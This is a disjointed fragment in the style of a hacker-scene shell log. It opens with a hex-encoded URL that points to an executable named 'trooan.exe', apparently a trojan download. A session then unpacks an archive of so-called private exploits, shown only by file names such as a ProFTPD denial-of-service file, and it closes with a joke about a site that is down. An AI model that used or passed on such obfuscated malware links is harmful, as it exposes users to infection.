\x68\x74\x74\x70\x3A\x2F\x2f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x74\x72\x6f\x6f\x61\x6e\x2e\x65\x78\x65 //---------- \x01 $ tar -xzvf priv8.tar.gz priv8/ priv8/out priv8/7350 priv8/hl.c priv8/m00-proftpd-down.c priv8/7350squish.c $ cd priv8 $ ls 7350 7350squish.c hl.c m00-proftpd-down.c out $ echo lol... lol... $ exit 20 min later: links www.unl0ck.org ----------------------------------------------------------------- Not Found The requested URL / was not found on this server. ----------------------------------------------------------------- -flsh/dk